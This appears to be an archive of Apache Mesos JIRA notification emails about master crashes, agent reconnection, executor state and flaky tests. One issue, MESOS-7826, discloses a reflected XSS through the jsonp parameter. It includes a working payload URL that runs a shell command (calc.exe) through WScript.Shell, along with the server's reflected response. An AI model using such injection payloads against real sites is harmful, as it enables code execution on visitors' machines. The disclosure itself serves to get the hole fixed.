>  Issue Type: Bug
>  Components: master
>Affects Versions: 1.1.0
>Reporter: Rob Johnson
>Assignee: Joseph Wu
>Priority: Critical
>  Labels: reliability
>
> We interact with the maintenance API frequently to orchestrate gracefully 
> draining agents of tasks without impacting service availability.
> Occasionally we seem to trigger a fatal error in Mesos when interacting with 
> the api. This happens relatively frequently, and impacts us when downstream 
> frameworks (marathon) react badly to leader elections.
> Here is the log line that we see when the master dies:
> {code}
> F0911 12:18:49.543401 123748 hierarchical.cpp:872] Check failed: 
> slaves[slaveId].maintenance.isSome()
> {code}
> It's quite possible we're using the maintenance API in the wrong way. We're 
> happy to provide any other logs you need - please let me know what would be 
> useful for debugging.
> Thanks.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Commented] (MESOS-7966) check for maintenance on agent causes fatal error

2018-01-23 Thread Vinod Kone (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-7966?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16336243#comment-16336243
 ] 

Vinod Kone commented on MESOS-7966:
---

[~kaysoky] Can you work on it in this sprint?

> check for maintenance on agent causes fatal error
> -
>
> Key: MESOS-7966
> URL: https://issues.apache.org/jira/browse/MESOS-7966
> Project: Mesos
>  Issue Type: Bug
>  Components: master
>Affects Versions: 1.1.0
>Reporter: Rob Johnson
>Assignee: Joseph Wu
>Priority: Critical
>  Labels: reliability
>
> We interact with the maintenance API frequently to orchestrate gracefully 
> draining agents of tasks without impacting service availability.
> Occasionally we seem to trigger a fatal error in Mesos when interacting with 
> the api. This happens relatively frequently, and impacts us when downstream 
> frameworks (marathon) react badly to leader elections.
> Here is the log line that we see when the master dies:
> {code}
> F0911 12:18:49.543401 123748 hierarchical.cpp:872] Check failed: 
> slaves[slaveId].maintenance.isSome()
> {code}
> It's quite possible we're using the maintenance API in the wrong way. We're 
> happy to provide any other logs you need - please let me know what would be 
> useful for debugging.
> Thanks.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Assigned] (MESOS-7966) check for maintenance on agent causes fatal error

2018-01-23 Thread Vinod Kone (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-7966?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Vinod Kone reassigned MESOS-7966:
-

Assignee: Joseph Wu  (was: Alexander Rukletsov)

> check for maintenance on agent causes fatal error
> -
>
> Key: MESOS-7966
> URL: https://issues.apache.org/jira/browse/MESOS-7966
> Project: Mesos
>  Issue Type: Bug
>  Components: master
>Affects Versions: 1.1.0
>Reporter: Rob Johnson
>Assignee: Joseph Wu
>Priority: Critical
>  Labels: reliability
>
> We interact with the maintenance API frequently to orchestrate gracefully 
> draining agents of tasks without impacting service availability.
> Occasionally we seem to trigger a fatal error in Mesos when interacting with 
> the api. This happens relatively frequently, and impacts us when downstream 
> frameworks (marathon) react badly to leader elections.
> Here is the log line that we see when the master dies:
> {code}
> F0911 12:18:49.543401 123748 hierarchical.cpp:872] Check failed: 
> slaves[slaveId].maintenance.isSome()
> {code}
> It's quite possible we're using the maintenance API in the wrong way. We're 
> happy to provide any other logs you need - please let me know what would be 
> useful for debugging.
> Thanks.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Updated] (MESOS-7622) Agent can crash if a HTTP executor tries to retry subscription in running state.

2018-01-23 Thread Vinod Kone (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-7622?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Vinod Kone updated MESOS-7622:
--
Sprint: Mesosphere Sprint 74

> Agent can crash if a HTTP executor tries to retry subscription in running 
> state.
> 
>
> Key: MESOS-7622
> URL: https://issues.apache.org/jira/browse/MESOS-7622
> Project: Mesos
>  Issue Type: Bug
>  Components: agent, executor
>Affects Versions: 1.2.2
>Reporter: Aaron Wood
>Assignee: Anand Mazumdar
>Priority: Critical
>
> It is possible that a running executor might retry its subscribe request. 
> This can lead to a crash if it previously had any launched tasks. Note that 
> the executor would still be able to subscribe again when the agent process 
> restarts and is recovering.
> {code}
> sudo ./mesos-agent --master=10.0.2.15:5050 --work_dir=/tmp/slave 
> --isolation=cgroups/cpu,cgroups/mem,disk/du,network/cni,filesystem/linux,docker/runtime
>  --image_providers=docker --image_provisioner_backend=overlay 
> --containerizers=mesos --launcher_dir=$(pwd) 
> --executor_environment_variables='{"LD_LIBRARY_PATH": 
> "/home/aaron/Code/src/mesos/build/src/.libs"}'
> WARNING: Logging before InitGoogleLogging() is written to STDERR
> I0605 14:58:23.748180 10710 main.cpp:323] Build: 2017-06-02 17:09:05 UTC by 
> aaron
> I0605 14:58:23.748252 10710 main.cpp:324] Version: 1.4.0
> I0605 14:58:23.755409 10710 systemd.cpp:238] systemd version `232` detected
> I0605 14:58:23.755450 10710 main.cpp:433] Initializing systemd state
> I0605 14:58:23.763049 10710 systemd.cpp:326] Started systemd slice 
> `mesos_executors.slice`
> I0605 14:58:23.763777 10710 resolver.cpp:69] Creating default secret resolver
> I0605 14:58:23.764214 10710 containerizer.cpp:230] Using isolation: 
> cgroups/cpu,cgroups/mem,disk/du,network/cni,filesystem/linux,docker/runtime,volume/image,environment_secret
> I0605 14:58:23.767192 10710 linux_launcher.cpp:150] Using 
> /sys/fs/cgroup/freezer as the freezer hierarchy for the Linux launcher
> E0605 14:58:23.770179 10710 shell.hpp:107] Command 'hadoop version 2>&1' 
> failed; this is the output:
> sh: 1: hadoop: not found
> I0605 14:58:23.770217 10710 fetcher.cpp:69] Skipping URI fetcher plugin 
> 'hadoop' as it could not be created: Failed to create HDFS client: Failed to 
> execute 'hadoop version 2>&1'; the command was either not found or exited 
> with a non-zero exit status: 127
> I0605 14:58:23.770643 10710 provisioner.cpp:255] Using default backend 
> 'overlay'
> I0605 14:58:23.785892 10710 slave.cpp:248] Mesos agent started on 
> (1)@127.0.1.1:5051
> I0605 14:58:23.785957 10710 slave.cpp:249] Flags at startup: 
> --appc_simple_discovery_uri_prefix="http://" 
> --appc_store_dir="/tmp/mesos/store/appc" --authenticate_http_readonly="false" 
> --authenticate_http_readwrite="false" --authenticatee="crammd5" 
> --authentication_backoff_factor="1secs" --authorizer="local" 
> --cgroups_cpu_enable_pids_and_tids_count="false" --cgroups_enable_cfs="false" 
> --cgroups_hierarchy="/sys/fs/cgroup" --cgroups_limit_swap="false" 
> --cgroups_root="mesos" --container_disk_watch_interval="15secs" 
> --containerizers="mesos" --default_role="*" --disk_watch_interval="1mins" 
> --docker="docker" --docker_kill_orphans="true" 
> --docker_registry="https://registry-1.docker.io" --docker_remove_delay="6hrs" 
> --docker_socket="/var/run/docker.sock" --docker_stop_timeout="0ns" 
> --docker_store_dir="/tmp/mesos/store/docker" 
> --docker_volume_checkpoint_dir="/var/run/mesos/isolators/docker/volume" 
> --enforce_container_disk_quota="false" 
> --executor_environment_variables="{"LD_LIBRARY_PATH":"\/home\/aaron\/Code\/src\/mesos\/build\/src\/.libs"}"
>  --executor_registration_timeout="1mins" 
> --executor_reregistration_timeout="2secs" 
> --executor_shutdown_grace_period="5secs" 
> --fetcher_cache_dir="/tmp/mesos/fetch" --fetcher_cache_size="2GB" 
> --frameworks_home="" --gc_delay="1weeks" --gc_disk_headroom="0.1" 
> --hadoop_home="" --help="false" --hostname_lookup="true" 
> --http_command_executor="false" --http_heartbeat_interval="30secs" 
> --image_providers="docker" --image_provisioner_backend="overlay" 
> --initialize_driver_logging="true" 
> --isolation="cgroups/cpu,cgroups/mem,disk/du,network/cni,filesystem/linux,docker/runtime"
>  --launcher="linux" --launcher_dir="/home/aaron/Code/src/mesos/build/src" 
> --logbufsecs="0" --logging_level="INFO" --master="10.0.2.15:5050" 
> --max_completed_executors_per_framework="150" 
> --oversubscribed_resources_interval="15secs" --perf_duration="10secs" 
> --perf_interval="1mins" --port="5051" --qos_correction_interval_min="0ns" 
> --quiet="false" --recover="reconnect" --recovery_timeout="15mins" 
> --registration_backoff_factor="1secs" --revocable_cpu_low_priority="true" 
> 

[jira] [Updated] (MESOS-7911) Non-checkpointing framework's tasks should not be marked LOST when agent disconnects.

2018-01-23 Thread Vinod Kone (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-7911?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Vinod Kone updated MESOS-7911:
--
Sprint: Mesosphere Sprint 74

> Non-checkpointing framework's tasks should not be marked LOST when agent 
> disconnects.
> -
>
> Key: MESOS-7911
> URL: https://issues.apache.org/jira/browse/MESOS-7911
> Project: Mesos
>  Issue Type: Bug
>Reporter: Benjamin Mahler
>Priority: Critical
>  Labels: reliability
>
> Currently, when a framework with checkpointing disabled has tasks running on an 
> agent and that agent disconnects from the master, the master will mark those 
> tasks LOST and remove them from its memory. The assumption is that the agent 
> is disconnecting because it terminated.
> However, it's possible that this disconnection occurred due to a transient 
> loss of connectivity and the agent re-connects while never having terminated. 
> This case violates our assumption of there being no unknown tasks to the 
> master:
> ```
> void Master::reconcileKnownSlave(
> Slave* slave,
> const vector& executors,
> const vector& tasks)
> {
>   ...
>   // TODO(bmahler): There's an implicit assumption here the slave
>   // cannot have tasks unknown to the master. This _should_ be the
>   // case since the causal relationship is:
>   //   slave removes task -> master removes task
>   // Add error logging for any violations of this assumption!
> ```
> As a result, the tasks would remain on the agent but the master would not 
> know about them!
> A more appropriate action here would be:
> (1) When an agent disconnects, mark the tasks as unreachable.
>   (a) If the framework is not partition aware, only show it the last known 
> task state.
>   (b) If the framework is partition aware, let it know that it's now 
> unreachable.
> (2) If the agent re-connects:
>   (a) And the agent had restarted, let the non-checkpointing framework know 
> its tasks are GONE/LOST.
>   (b) If the agent still holds the tasks, the tasks are restored as reachable.
> (3) If the agent gets removed:
>   (a) For partition aware non-checkpointing frameworks, let them know the 
> tasks are unreachable.
>   (b) For non partition aware non-checkpointing frameworks, let them know the 
> tasks are lost and kill them if the agent comes back.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Assigned] (MESOS-7911) Non-checkpointing framework's tasks should not be marked LOST when agent disconnects.

2018-01-23 Thread Vinod Kone (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-7911?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Vinod Kone reassigned MESOS-7911:
-

Assignee: (was: Gilbert Song)

> Non-checkpointing framework's tasks should not be marked LOST when agent 
> disconnects.
> -
>
> Key: MESOS-7911
> URL: https://issues.apache.org/jira/browse/MESOS-7911
> Project: Mesos
>  Issue Type: Bug
>Reporter: Benjamin Mahler
>Priority: Critical
>  Labels: reliability
>
> Currently, when a framework with checkpointing disabled has tasks running on an 
> agent and that agent disconnects from the master, the master will mark those 
> tasks LOST and remove them from its memory. The assumption is that the agent 
> is disconnecting because it terminated.
> However, it's possible that this disconnection occurred due to a transient 
> loss of connectivity and the agent re-connects while never having terminated. 
> This case violates our assumption of there being no unknown tasks to the 
> master:
> ```
> void Master::reconcileKnownSlave(
> Slave* slave,
> const vector& executors,
> const vector& tasks)
> {
>   ...
>   // TODO(bmahler): There's an implicit assumption here the slave
>   // cannot have tasks unknown to the master. This _should_ be the
>   // case since the causal relationship is:
>   //   slave removes task -> master removes task
>   // Add error logging for any violations of this assumption!
> ```
> As a result, the tasks would remain on the agent but the master would not 
> know about them!
> A more appropriate action here would be:
> (1) When an agent disconnects, mark the tasks as unreachable.
>   (a) If the framework is not partition aware, only show it the last known 
> task state.
>   (b) If the framework is partition aware, let it know that it's now 
> unreachable.
> (2) If the agent re-connects:
>   (a) And the agent had restarted, let the non-checkpointing framework know 
> its tasks are GONE/LOST.
>   (b) If the agent still holds the tasks, the tasks are restored as reachable.
> (3) If the agent gets removed:
>   (a) For partition aware non-checkpointing frameworks, let them know the 
> tasks are unreachable.
>   (b) For non partition aware non-checkpointing frameworks, let them know the 
> tasks are lost and kill them if the agent comes back.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Updated] (MESOS-7887) `GET_EXECUTORS` and `/state` is not consistent between master and agent

2018-01-23 Thread Vinod Kone (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-7887?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Vinod Kone updated MESOS-7887:
--
Priority: Minor  (was: Critical)

> `GET_EXECUTORS` and `/state` is not consistent between master and agent
> ---
>
> Key: MESOS-7887
> URL: https://issues.apache.org/jira/browse/MESOS-7887
> Project: Mesos
>  Issue Type: Improvement
>  Components: HTTP API, master
>Affects Versions: 1.3.0, 1.5.0
>Reporter: Alexander Rojas
>Priority: Minor
>  Labels: master, mesosphere, v1_api
>
> The master seems not to keep information about the executors, since they are 
> not returned either by getting the master state (with either the v0 or v1 
> APIs) or with the {{GET_EXECUTORS}} call. Creating a cluster as follows:
> {noformat}
> ./bin/mesos-master.sh \
> --ip=${MASTER_IP} \
> --work_dir=/tmp/mesos/master \
> --log_dir=/tmp/mesos/master/log
> {noformat}
> {noformat}
> sudo ./bin/mesos-agent.sh \
> --master=${MASTER_IP}:5050 \
> --work_dir=/tmp/mesos/agent \
> --log_dir=/tmp/mesos/agent/log \
> --containerizers=mesos,docker
> {noformat}
> And launching a couple of frameworks as follows:
> {noformat}
> ./src/mesos-execute \
> --master=${MASTER_IP}:5050 \
> 
> --task='{"name":"test-custom-command","task_id":{"value":"test-custom-command-task-1"},"agent_id":{"value":"50f4e551-aa5c-42db-8967-4dc3ee11658f-S0"},"resources":[{"name":"cpus","type":"SCALAR","scalar":{"value":1}},{"name":"mem","type":"SCALAR","scalar":{"value":32}},{"name":"disk","type":"SCALAR","scalar":{"value":32}}],"executor":{"executor_id":{"value":"test-custom-command-executor"},"command":{"value":"while
>  true; do echo \"Hello World\"; sleep 5; done;"}}}'
> {noformat}
> {noformat}
> ./src/mesos-execute \
> --master=${MASTER_IP}:5050 \
> --name=test-command \
> --command='while true; do echo "Hello World"; sleep 5; done;' \
> --containerizer=docker \
> --docker_image=ubuntu:latest
> {noformat}
> Now, using the operator endpoints on the agent:
> {noformat}
> $ http POST ${AGENT_IP}:5051/api/v1 type=GET_EXECUTORS
> {
>   "get_executors": {
> "completed_executors": [
> ],
> "executors": [
>   {
> "executor_info": {
>   "command": {
> "arguments": [
>   "mesos-executor",
>   "--launcher_dir=/workspace/mesos/build/src"
> ],
> "shell": false,
> "value": "/workspace/mesos/build/src/mesos-executor"
>   },
>   "container": {
> "docker": {
>   "image": "ubuntu:latest",
>   "network": "HOST",
>   "privileged": false
> },
> "type": "DOCKER"
>   },
>   "executor_id": {
> "value": "test-command"
>   },
>   "framework_id": {
> "value": "87577bcd-093d-4240-a24b-107b4d1d21bd-0001"
>   },
>   "name": "Command Executor (Task: test-command) (Command: sh -c 
> 'while true; ...')",
>   "resources": [
> {
>   "allocation_info": {
> "role": "*"
>   },
>   "name": "cpus",
>   "scalar": {
> "value": 0.1
>   },
>   "type": "SCALAR"
> },
> {
>   "allocation_info": {
> "role": "*"
>   },
>   "name": "mem",
>   "scalar": {
> "value": 32
>   },
>   "type": "SCALAR"
> }
>   ],
>   "source": "test-command"
> }
>   },
>   {
> "executor_info": {
>   "command": {
> "shell": true,
> "value": "while true; do echo \"Hello World\"; sleep 5; done;"
>   },
>   "executor_id": {
> "value": "test-custom-command-executor"
>   },
>   "framework_id": {
> "value": "87577bcd-093d-4240-a24b-107b4d1d21bd-"
>   }
> }
>   }
> ]
>   },
>   "type": "GET_EXECUTORS"
> }
> {noformat}
> While the master returns no executors:
> {noformat}
>  http POST ${MASTER_IP}:5050/api/v1 type=GET_EXECUTORS
> {
> "get_executors": {},
> "type": "GET_EXECUTORS"
> }
> {noformat}
> These results are consistent when using the `/state` endpoint on both agent 
> and master, as well as the {{GET_STATE}} v1 API call: the agent returns 
> information about executors, while the master response has none.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Updated] (MESOS-7991) fatal, check failed !framework->recovered()

2018-01-23 Thread Vinod Kone (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-7991?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Vinod Kone updated MESOS-7991:
--
Sprint: Mesosphere Sprint 66, Mesosphere Sprint 67, Mesosphere Sprint 68, 
Mesosphere Sprint 74  (was: Mesosphere Sprint 66, Mesosphere Sprint 67, 
Mesosphere Sprint 68)

> fatal, check failed !framework->recovered()
> ---
>
> Key: MESOS-7991
> URL: https://issues.apache.org/jira/browse/MESOS-7991
> Project: Mesos
>  Issue Type: Bug
>Reporter: Jack Crawford
>Assignee: Alexander Rukletsov
>Priority: Critical
>  Labels: reliability
>
> mesos master crashed on what appears to be framework recovery
> mesos master version: 1.3.1
> mesos agent version: 1.3.1
> {code}
> W0920 14:58:54.756364 25452 master.cpp:7568] Task 
> 862181ec-dffb-4c03-8807-5fb4c4e9a907 of framework 
> 889aae9d-1aab-4268-ba42-9d5c2461d871 unknown to the agent 
> a498d458-bbca-426e-b076-b328f5b035da-S5225 at slave(1)
> @10.0.239.217:5051 (ip-10-0-239-217) during re-registration: reconciling with 
> the agent
> W0920 14:58:54.756369 25452 master.cpp:7568] Task 
> 9c21c48a-63ad-4d58-9e22-f720af19a644 of framework 
> 889aae9d-1aab-4268-ba42-9d5c2461d871 unknown to the agent 
> a498d458-bbca-426e-b076-b328f5b035da-S5225 at slave(1)
> @10.0.239.217:5051 (ip-10-0-239-217) during re-registration: reconciling with 
> the agent
> W0920 14:58:54.756376 25452 master.cpp:7568] Task 
> 05c451f8-c48a-47bd-a235-0ceb9b3f8d0c of framework 
> 889aae9d-1aab-4268-ba42-9d5c2461d871 unknown to the agent 
> a498d458-bbca-426e-b076-b328f5b035da-S5225 at slave(1)
> @10.0.239.217:5051 (ip-10-0-239-217) during re-registration: reconciling with 
> the agent
> W0920 14:58:54.756381 25452 master.cpp:7568] Task 
> e8641b1f-f67f-42fe-821c-09e5a290fc60 of framework 
> 889aae9d-1aab-4268-ba42-9d5c2461d871 unknown to the agent 
> a498d458-bbca-426e-b076-b328f5b035da-S5225 at slave(1)
> @10.0.239.217:5051 (ip-10-0-239-217) during re-registration: reconciling with 
> the agent
> W0920 14:58:54.756386 25452 master.cpp:7568] Task 
> f838a03c-5cd4-47eb-8606-69b004d89808 of framework 
> 889aae9d-1aab-4268-ba42-9d5c2461d871 unknown to the agent 
> a498d458-bbca-426e-b076-b328f5b035da-S5225 at slave(1)
> @10.0.239.217:5051 (ip-10-0-239-217) during re-registration: reconciling with 
> the agent
> W0920 14:58:54.756392 25452 master.cpp:7568] Task 
> 685ca5da-fa24-494d-a806-06e03bbf00bd of framework 
> 889aae9d-1aab-4268-ba42-9d5c2461d871 unknown to the agent 
> a498d458-bbca-426e-b076-b328f5b035da-S5225 at slave(1)
> @10.0.239.217:5051 (ip-10-0-239-217) during re-registration: reconciling with 
> the agent
> W0920 14:58:54.756397 25452 master.cpp:7568] Task 
> 65ccf39b-5c46-4121-9fdd-21570e8068e6 of framework 
> 889aae9d-1aab-4268-ba42-9d5c2461d871 unknown to the agent 
> a498d458-bbca-426e-b076-b328f5b035da-S5225 at slave(1)
> @10.0.239.217:5051 (ip-10-0-239-217) during re-registration: reconciling with 
> the agent
> F0920 14:58:54.756404 25452 master.cpp:7601] Check failed: 
> !framework->recovered()
> *** Check failure stack trace: ***
> @ 0x7f7bf80087ed  google::LogMessage::Fail()
> @ 0x7f7bf800a5a0  google::LogMessage::SendToLog()
> @ 0x7f7bf80083d3  google::LogMessage::Flush()
> @ 0x7f7bf800afc9  google::LogMessageFatal::~LogMessageFatal()
> @ 0x7f7bf736fe7e  
> mesos::internal::master::Master::reconcileKnownSlave()
> @ 0x7f7bf739e612  mesos::internal::master::Master::_reregisterSlave()
> @ 0x7f7bf73a580e  
> _ZNSt17_Function_handlerIFvPN7process11ProcessBaseEEZNS0_8dispatchIN5mesos8internal6master6MasterERKNS5_9SlaveInfoERKNS0_4UPIDERK6OptionINSt7__cxx1112basic_stringIcSt11char_traitsIcESaIc
> RKSt6vectorINS5_8ResourceESaISQ_EERKSP_INS5_12ExecutorInfoESaISV_EERKSP_INS5_4TaskESaIS10_EERKSP_INS5_13FrameworkInfoESaIS15_EERKSP_INS6_17Archive_FrameworkESaIS1A_EERKSL_RKSP_INS5_20SlaveInfo_CapabilityESaIS
> 1H_EERKNS0_6FutureIbEES9_SC_SM_SS_SX_S12_S17_S1C_SL_S1J_S1N_EEvRKNS0_3PIDIT_EEMS1R_FvT0_T1_T2_T3_T4_T5_T6_T7_T8_T9_T10_ET11_T12_T13_T14_T15_T16_T17_T18_T19_T20_T21_EUlS2_E_E9_M_invokeERKSt9_Any_dataOS2_
> @ 0x7f7bf7f5e69c  process::ProcessBase::visit()
> @ 0x7f7bf7f71403  process::ProcessManager::resume()
> @ 0x7f7bf7f7c127  
> _ZNSt6thread5_ImplISt12_Bind_simpleIFZN7process14ProcessManager12init_threadsEvEUt_vEEE6_M_runEv
> @ 0x7f7bf60b5c80  (unknown)
> @ 0x7f7bf58c86ba  start_thread
> @ 0x7f7bf55fe3dd  (unknown)
> mesos-master.service: Main process exited, code=killed, status=6/ABRT
> mesos-master.service: Unit entered failed state.
> mesos-master.service: Failed with result 'signal'.
> {code}



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Updated] (MESOS-5918) Replace jsonp with a more secure alternative

2018-01-23 Thread Vinod Kone (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-5918?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Vinod Kone updated MESOS-5918:
--
Labels: security  (was: )

> Replace jsonp with a more secure alternative
> 
>
> Key: MESOS-5918
> URL: https://issues.apache.org/jira/browse/MESOS-5918
> Project: Mesos
>  Issue Type: Improvement
>  Components: json api, webui
>Reporter: Yan Xu
>Priority: Major
>  Labels: security
>
> We currently use the {{jsonp}} technique to bypass the CORS check. This practice 
> has many security concerns (see discussions on MESOS-5911) so we should 
> replace it with a better alternative.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Updated] (MESOS-5918) Replace jsonp with a more secure alternative

2018-01-23 Thread Vinod Kone (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-5918?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Vinod Kone updated MESOS-5918:
--
Component/s: json api

> Replace jsonp with a more secure alternative
> 
>
> Key: MESOS-5918
> URL: https://issues.apache.org/jira/browse/MESOS-5918
> Project: Mesos
>  Issue Type: Improvement
>  Components: json api, webui
>Reporter: Yan Xu
>Priority: Major
>  Labels: security
>
> We currently use the {{jsonp}} technique to bypass the CORS check. This practice 
> has many security concerns (see discussions on MESOS-5911) so we should 
> replace it with a better alternative.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Updated] (MESOS-7826) XSS in JSONP parameter

2018-01-23 Thread Vinod Kone (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-7826?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Vinod Kone updated MESOS-7826:
--
Labels: security  (was: )

> XSS in JSONP parameter
> --
>
> Key: MESOS-7826
> URL: https://issues.apache.org/jira/browse/MESOS-7826
> Project: Mesos
>  Issue Type: Improvement
>  Components: json api
> Environment: Running as part of DC/OS in a docker container.
>Reporter: Vincent Ruijter
>Priority: Critical
>  Labels: security
>
> It is possible to inject arbitrary content into a server request. Take into 
> account the following url: 
> https://xxx.xxx.com/mesos/master/state?jsonp=var+oShell+%3d+new+ActiveXObject("WScript.Shell")%3boShell.Run("calc.exe",+1)%3b
> This will result in the following request:
> {code:html}
> GET 
> /mesos/master/state?jsonp=var+oShell+%3d+new+ActiveXObject("WScript.Shell")%3boShell.Run("calc.exe",+1)%3b
>  HTTP/1.1
> Host: xxx.xxx.com
> User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 
> Firefox/54.0
> Accept: */*
> Accept-Language: en-US,en;q=0.5
> [...SNIP...]
> {code}
> The server response:
> {code:html}
> HTTP/1.1 200 OK
> Server: openresty/1.9.15.1
> Date: Tue, 25 Jul 2017 09:04:31 GMT
> Content-Type: text/javascript
> Content-Length: 1411637
> Connection: close
> var oShell = new ActiveXObject("WScript.Shell");oShell.Run("calc.exe", 
> 1);({"version":"1.2.1","git_sha":"f219b2e4f6265c0b6c4d826a390b67fe9d5e1097","build_date":"2017-06-01
>  19:16:40","build_time":149634
> [...SNIP...]
> {code}
> On Internet Explorer this will trigger a file download, and executing the 
> file (state.js) will pop up a calculator. My recommendation is to apply input 
> validation to this parameter to prevent abuse.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Updated] (MESOS-6551) Add attach/exec commands to the Mesos CLI

2018-01-23 Thread Vinod Kone (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-6551?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Vinod Kone updated MESOS-6551:
--
Priority: Major  (was: Critical)

> Add attach/exec commands to the Mesos CLI
> -
>
> Key: MESOS-6551
> URL: https://issues.apache.org/jira/browse/MESOS-6551
> Project: Mesos
>  Issue Type: Task
>  Components: cli
>Reporter: Kevin Klues
>Assignee: Armand Grillet
>Priority: Major
>  Labels: debugging, mesosphere
>
> After all of this support has landed, we need to update the Mesos CLI to 
> implement {{attach}} and {{exec}} functionality as outlined in the Design Doc



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Commented] (MESOS-8471) Allow revocable_resources capability for mesos-execute

2018-01-23 Thread Zhitao Li (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8471?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16336149#comment-16336149
 ] 

Zhitao Li commented on MESOS-8471:
--

A quick attempt is at https://reviews.apache.org/r/65294/

> Allow revocable_resources capability for mesos-execute
> --
>
> Key: MESOS-8471
> URL: https://issues.apache.org/jira/browse/MESOS-8471
> Project: Mesos
>  Issue Type: Improvement
>  Components: cli
>Reporter: Zhitao Li
>Priority: Minor
>
> While mesos-execute is a nice tool to quickly test certain behavior of Mesos 
> itself without an external framework, it seems there is no direct way to 
> test revocable support in it.
> A quick test with the binary suggests that if we infer *REVOCABLE_RESOURCES* 
> capability from input, this should allow revocable resources on `task` or 
> `task_group` to be launched to Mesos.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Commented] (MESOS-7506) Multiple tests leave orphan containers.

2018-01-23 Thread Andrei Budnik (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-7506?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16336134#comment-16336134
 ] 

Andrei Budnik commented on MESOS-7506:
--

Steps to reproduce `LinuxCapabilitiesIsolatorFlagsTest.ROOT_IsolatorFlags`:
 # Add {{::sleep(1);}} before 
[removing|https://github.com/apache/mesos/blob/e91ce42ed56c5ab65220fbba740a8a50c7f835ae/src/linux/cgroups.cpp#L483]
 "test" cgroup
 # recompile
 # run `GLOG_v=2 sudo GLOG_v=2 ./src/mesos-tests 
--gtest_filter=LinuxCapabilitiesIsolatorFlagsTest.ROOT_IsolatorFlags 
--gtest_break_on_failure --gtest_repeat=10 --verbose`

> Multiple tests leave orphan containers.
> ---
>
> Key: MESOS-7506
> URL: https://issues.apache.org/jira/browse/MESOS-7506
> Project: Mesos
>  Issue Type: Bug
>  Components: containerization
> Environment: Ubuntu 16.04
> Fedora 23
> other Linux distros
>Reporter: Alexander Rukletsov
>Assignee: Andrei Budnik
>Priority: Major
>  Labels: containerizer, flaky-test, mesosphere
> Attachments: KillMultipleTasks-badrun.txt, 
> ROOT_IsolatorFlags-badrun.txt, ROOT_IsolatorFlags-badrun2.txt, 
> ROOT_IsolatorFlags-badrun3.txt, ReconcileTasksMissingFromSlave-badrun.txt, 
> ResourceLimitation-badrun.txt, ResourceLimitation-badrun2.txt, 
> RestartSlaveRequireExecutorAuthentication-badrun.txt, 
> TaskWithFileURI-badrun.txt
>
>
> I've observed a number of flaky tests that leave orphan containers upon 
> cleanup. A typical log looks like this:
> {noformat}
> ../../src/tests/cluster.cpp:580: Failure
> Value of: containers->empty()
>   Actual: false
> Expected: true
> Failed to destroy containers: { da3e8aa8-98e7-4e72-a8fd-5d0bae960014 }
> {noformat}
> All currently affected tests:
> {noformat}
> SlaveTest.RestartSlaveRequireExecutorAuthentication // cannot reproduce any 
> more
> ROOT_IsolatorFlags
> {noformat}



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Commented] (MESOS-8474) Test StorageLocalResourceProviderTest.ROOT_ConvertPreExistingVolume is flaky

2018-01-23 Thread Benjamin Bannier (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8474?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16335940#comment-16335940
 ] 

Benjamin Bannier commented on MESOS-8474:
-

This failed again with a different error,

{noformat}
../../src/tests/storage_local_resource_provider_tests.cpp:1877
block is NONE
{noformat}

I attached [the full test 
log|https://issues.apache.org/jira/secure/attachment/12907300/consoleText.txt].

> Test StorageLocalResourceProviderTest.ROOT_ConvertPreExistingVolume is flaky
> 
>
> Key: MESOS-8474
> URL: https://issues.apache.org/jira/browse/MESOS-8474
> Project: Mesos
>  Issue Type: Bug
>  Components: storage, test
>Affects Versions: 1.5.0
>Reporter: Benjamin Bannier
>Assignee: Chun-Hung Hsiao
>Priority: Major
>  Labels: flaky, flaky-test, mesosphere
> Attachments: consoleText.txt, consoleText.txt
>
>
> Observed on our internal CI on ubuntu16.04 with SSL and GRPC enabled,
> {noformat}
> ../../src/tests/storage_local_resource_provider_tests.cpp:1898
>   Expected: 2u
>   Which is: 2
